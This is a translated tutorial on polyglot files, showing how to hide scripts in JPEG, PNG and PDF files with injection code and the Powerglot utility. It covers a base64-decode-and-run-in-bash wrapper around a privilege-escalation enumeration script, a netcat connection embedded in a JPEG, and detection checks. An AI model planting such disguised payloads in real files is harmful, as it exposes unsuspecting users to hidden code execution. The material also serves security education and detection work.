Polyglot files, or how a cat picture can become a threat to your information security

Of course, “security threat” sounds rather grandiose for a cute cat looking at you from a JPEG image, but a malicious script can easily hide among its bytes. Let’s see what’s what.

What polyglots are and how they work

A polyglot file is a file that is treated as a different type depending on the context in which it is used. For example, a JPEG image file may also contain an exploit that collects information about a Linux computer. How the polyglot is interpreted depends on how it is opened. This is achieved by preserving the signature bytes that various systems use to determine the file type.
Some examples of signature bytes:
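
To illustrate what signature bytes look like, here is a minimal Python sketch. The byte values are the well-known leading bytes of each format; the table name SIGNATURES and the function guess_type are hypothetical names chosen for this example, and real detectors check far more than the first few bytes.

```python
# Well-known leading "magic" bytes. The table and function names are
# illustrative only and are not taken from any particular tool.
SIGNATURES = {
    "JPEG": b"\xff\xd8\xff",
    "PNG": b"\x89PNG\r\n\x1a\n",
    "PDF": b"%PDF-",
    "shell script": b"#!",
}


def guess_type(data: bytes) -> str:
    """Return the first format whose signature matches the start of data."""
    for name, magic in SIGNATURES.items():
        if data.startswith(magic):
            return name
    return "unknown"


print(guess_type(b"\xff\xd8\xff\xe0\x00\x10JFIF"))  # JPEG
```

A check like this only looks at the start of the file, which is exactly why a polyglot that keeps those bytes intact still passes as its "cover" format.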

Most polyglots contain code written in a single programming language. They are most often used to bypass protection based on file extensions: a user is far more likely to be allowed to download a file with a JPEG, PNG, or PDF extension than one with a potentially dangerous JS, SH, or HTML extension.

You can read more about polyglots, for example, here or here.

Principles for creating polyglots of various formats

Since each file format has its own structure and its own mandatory key elements, each type has its own way of injecting exploits. I will not go over the format structures themselves and will only touch on how code is injected. If you are interested in how the formats work, here are some excellent articles on Habr about some of them:
– JPEG decoding for dummies
– PNG – not GIF!

JPEG format

To hide an exploit in a JPEG, the file structure is modified: the length value is increased by the required number of bytes.
Original file structure:

Sample original content

After the value is changed, extra space appears in the file where the exploit can be placed:

Changed content example
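
The idea of enlarging a length value can be sketched in Python as follows. This is only an illustration under stated assumptions: it enlarges the first marker segment after the start-of-image marker (usually APP0) and appends the payload at the end of that segment. The function name grow_first_segment is hypothetical, and this is not necessarily how Powerglot does it.

```python
import struct


def grow_first_segment(jpeg: bytes, payload: bytes) -> bytes:
    """Enlarge the first marker segment of a JPEG and append payload to it.

    Assumption for this sketch: the file starts with SOI (FF D8) followed
    directly by a marker segment (FF xx) with a 2-byte big-endian length
    that counts the length field itself.
    """
    if jpeg[:2] != b"\xff\xd8" or jpeg[2] != 0xFF:
        raise ValueError("not a JPEG with a marker segment after SOI")
    (length,) = struct.unpack(">H", jpeg[4:6])
    new_length = length + len(payload)
    if new_length > 0xFFFF:
        raise ValueError("payload does not fit into a single segment")
    segment_end = 4 + length  # first byte after the original segment
    return (
        jpeg[:4]                          # SOI + segment marker
        + struct.pack(">H", new_length)   # enlarged length value
        + jpeg[6:segment_end]             # original segment data
        + payload                         # bytes placed in the new space
        + jpeg[segment_end:]              # rest of the image, unchanged
    )
```

Decoders that skip a segment by its declared length will jump over the extra bytes, so the image is still displayed as before.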

PNG format

Because a PNG file is a sequence of chunks, the usual way to hide data is to add a new chunk after IHDR. Original file structure:

Structure before change

A tEXt chunk is added, which can hold the hidden data, in our case a JS + HTML exploit:

Structure after change
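
Adding a tEXt chunk after IHDR can be sketched in Python like this. The chunk layout (4-byte length, 4-byte type, data, CRC-32 over type and data) follows the PNG format; the helper names make_chunk and add_text_chunk are hypothetical and exist only for this illustration.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def make_chunk(chunk_type: bytes, data: bytes) -> bytes:
    """Build a PNG chunk: length, type, data, CRC-32 over type + data."""
    crc = zlib.crc32(chunk_type + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + chunk_type + data + struct.pack(">I", crc)


def add_text_chunk(png: bytes, keyword: bytes, text: bytes) -> bytes:
    """Insert a tEXt chunk (keyword, NUL separator, text) right after IHDR."""
    if not png.startswith(PNG_SIGNATURE) or png[12:16] != b"IHDR":
        raise ValueError("not a PNG file with a leading IHDR chunk")
    (ihdr_len,) = struct.unpack(">I", png[8:12])
    # signature (8) + length (4) + type (4) + IHDR data + CRC (4)
    ihdr_end = 8 + 4 + 4 + ihdr_len + 4
    text_chunk = make_chunk(b"tEXt", keyword + b"\x00" + text)
    return png[:ihdr_end] + text_chunk + png[ihdr_end:]
```

Image viewers ignore the contents of a tEXt chunk when rendering, so the picture looks the same while the file carries the extra text.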

PDF format

Various string obfuscation tricks are often used. Normally each string is enclosed in parentheses, but nothing prevents an attacker from writing it as a “column” or replacing each character of the string with its octal or hexadecimal representation, and the digits can be separated by any number of spaces.

Also, in a PDF you can “hide” JS exploits using /JavaScript /JS objects, which can either contain executable code themselves or refer to another JS object.

In addition to the methods above, the code can be obfuscated with hex sequences: for example, /JavaScript can become /J#61#76#61Script (in hex, a = 61, v = 76, a = 61).
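
To see why such obfuscation is cheap to undo, here is a minimal Python sketch that decodes the #xx escapes in a PDF name. The function name decode_pdf_name is hypothetical; the sketch handles only the hex escapes discussed here and nothing else.

```python
import re


def decode_pdf_name(name: bytes) -> bytes:
    """Replace every #xx hex escape in a PDF name with the byte it encodes."""
    return re.sub(
        rb"#([0-9A-Fa-f]{2})",
        lambda m: bytes.fromhex(m.group(1).decode("ascii")),
        name,
    )


print(decode_pdf_name(b"/J#61#76#61Script"))  # b'/JavaScript'
```

A scanner that searches the raw bytes for /JavaScript without normalizing names first would miss the obfuscated form.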

Working with polyglots

After the brief theory, we can move on to the exciting part: practice.
Now we will try to create and open polyglots in various ways, and also analyze files for polyglot signatures.

For clarity, the chapter is divided into subsections named after the combined formats; each contains the steps for creating*, running, and detecting* polyglots.

* – The powerglot utility is used to create and detect polyglots.

PDF+Bash

Making a polyglot

First step – preparing the script. We pick a suitable Bash exploit (I will use the Local Linux Enumeration & Privilege Escalation Script, which is included in the files of the powerglot utility), encode it in base64, and write the result to an .sh file.

base64 -w 0 ./path/to/script > b64.sh
Exploit encoding in base64

Now we need to edit the file so that the base64 text is decoded back into the source code and executed by bash. To do this, we wrap the encoded string in the following commands:

echo "base64-encoded script goes here" | base64 -d | bash;
  • echo – prints its argument to standard output;

  • base64 -d – decodes from base64;

  • bash – runs the script.

This is what the result should look like:

Contents of the edited script file
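
The encode-and-wrap step can also be sketched in Python. This is an illustration only: the function name wrap_script is hypothetical, and it simply produces the same one-line wrapper that the manual steps build.

```python
import base64


def wrap_script(script: bytes) -> str:
    """Return a shell line that decodes the base64 text and pipes it to bash."""
    encoded = base64.b64encode(script).decode("ascii")
    return f'echo "{encoded}" | base64 -d | bash;'


print(wrap_script(b"echo hello\n"))
```

Standard base64 output contains only letters, digits, "+", "/" and "=", so it is safe to place inside double quotes in the shell.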

Second step – merging the edited script with a PDF. This is done with the Powerglot utility:

python3 powerglot.py -o ./path_1/b64.sh ./path_2/test.PDF OUTPUT
  • -o – the switch that encodes the script into a file;

  • ./path_1/b64.sh – path to the script;

  • ./path_2/test.PDF – path to the file into which the script is encoded, in this case a PDF;

  • OUTPUT – the name of the resulting file with the script encoded in it;
    its extension depends on the file the script was encoded into.

After that, we have a ready-made polyglot that can already do something.

Checking and running a polyglot

The figure shows that opening the PDF file and inspecting it with terminal commands reveals no anomalies.

Initial examination of a polyglot

The script inside the polyglot is triggered by running the file in the terminal (after first giving it execute permission).

The exploit prints detailed information about the host to the console: OS, file system, installed programs, and so on.

Launching PDF Polyglot

In addition, the Powerglot utility has a polyglot detection function: it checks certain bytes against known patterns that may indicate suspicious content, and it can also distinguish stegosploits (a topic for a separate article) from ordinary polyglots. The function is shown in the figure below. However, if the directory is scanned after the PDF polyglot is created, the program does not flag it as a malicious file, even though it created the file itself.

Running Powerglot Polyglot Detection
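
Pattern-based detection in general can be sketched in a few lines of Python. This is not Powerglot's actual logic, which is not shown in this article: the pattern list, the names SUSPICIOUS_PATTERNS and looks_like_polyglot, and the heuristic itself are assumptions made purely for illustration.

```python
# Hypothetical heuristic, not Powerglot's real rule set: a file that starts
# with an image or PDF signature but also contains shell or script markers
# is treated as suspicious.
DOCUMENT_SIGNATURES = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"%PDF-")
SUSPICIOUS_PATTERNS = (b"| base64 -d", b"| bash", b"#!/bin/", b"<script")


def looks_like_polyglot(data: bytes) -> bool:
    """Return True if data has a document signature and a suspicious pattern."""
    is_document = data.startswith(DOCUMENT_SIGNATURES)
    return is_document and any(pattern in data for pattern in SUSPICIOUS_PATTERNS)
```

A fixed pattern list like this is easy to evade and can produce false positives, which is one plausible reason a detector may flag one polyglot and miss another.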

JPEG+Bash

Making a polyglot

First step – as with the PDF polyglot, you need to prepare an exploit. Let’s create a simple executable file that connects the host that opened our polyglot to a server and lets the two exchange messages. This is possible thanks to the netcat command-line utility, which sends and receives data over network connections.

Let’s move on to creating an exploit:

echo "nc 127.0.0.1 4444" > netcat.sh
  • echo – prints its argument to standard output;

  • nc 127.0.0.1 4444 – connects with the netcat (nc) utility to a server, in this case the local machine itself, on port 4444;

  • > – redirects the output of echo from the terminal to a file;

  • netcat.sh – the resulting file containing the exploit.

Second step – merging the resulting exploit with a JPEG file. As with the PDF polyglot, we use the Powerglot utility:

python3 powerglot.py -o ./path_1/netcat.sh ./path_2/cat.jpg OUTPUT
  • -o – the switch that encodes the script into a file;

  • ./path_1/netcat.sh – path to the script;

  • ./path_2/cat.jpg – path to the file into which the script is encoded, in this case a JPEG;

  • OUTPUT – the name of the resulting file with the script encoded in it; its extension depends on the file the script was encoded into.

Checking and running a polyglot

The resulting image shows no visible artifacts or anomalies.

Opening a polyglot based on a JPEG image

To check the result, you need to run a simple “server” to receive and send messages on port 4444:

nc -nvlp 4444

Now, when the polyglot is run in the terminal, a connection is established between the host and the server, and the two can exchange messages. This does little harm by itself, but the concept and principle of operation show what polyglots are capable of.

Run jpeg polyglot

Starting the “server”
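
What the two netcat commands do can be imitated with Python's socket module. The sketch below is only an analogy under stated assumptions: it plays both roles in one process, uses an ephemeral port instead of 4444 so that it does not clash with anything, and sends a single message in one direction. The function name exchange_once is hypothetical.

```python
import socket
import threading


def exchange_once(message: bytes, host: str = "127.0.0.1") -> bytes:
    """Start a one-shot listener, connect to it, and return what it received."""
    received = []
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server:
        server.bind((host, 0))          # port 0: let the OS pick a free port
        server.listen(1)
        port = server.getsockname()[1]

        def accept_one() -> None:
            # Plays the role of the listening side (like "nc -nvlp").
            conn, _ = server.accept()
            with conn:
                chunks = []
                while True:
                    data = conn.recv(1024)
                    if not data:        # the peer closed the connection
                        break
                    chunks.append(data)
                received.append(b"".join(chunks))

        listener = threading.Thread(target=accept_one)
        listener.start()
        # Plays the role of the connecting side (like "nc 127.0.0.1 <port>").
        with socket.create_connection((host, port)) as client:
            client.sendall(message)
        listener.join()
    return received[0]


print(exchange_once(b"hello from the polyglot"))  # b'hello from the polyglot'
```

In the article's setup, the listening side is the “server” started by hand, and the connecting side is the script hidden in the image.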

This time, the polyglot detection program marked our newly created polyglot as suspicious.

Conclusion

Polyglots are an interesting kind of information security threat. They can certainly catch inattentive users off guard, but modern defenses will most likely keep them from spreading widely.

You can experiment with polyglots for a long time and even try to find a useful application for them, one that will not get you charged under Article 273 of the Russian Criminal Code. 😉

As a continuation of this topic, we could look at stegosploits: polyglots in which a browser exploit is steganographically encoded into a JPG or PNG image, and the resulting file is then “merged” with an HTML page containing a JS decoder for the exploit hidden in the image, turning the file into an HTML+Image polyglot…

But that’s a completely different story!
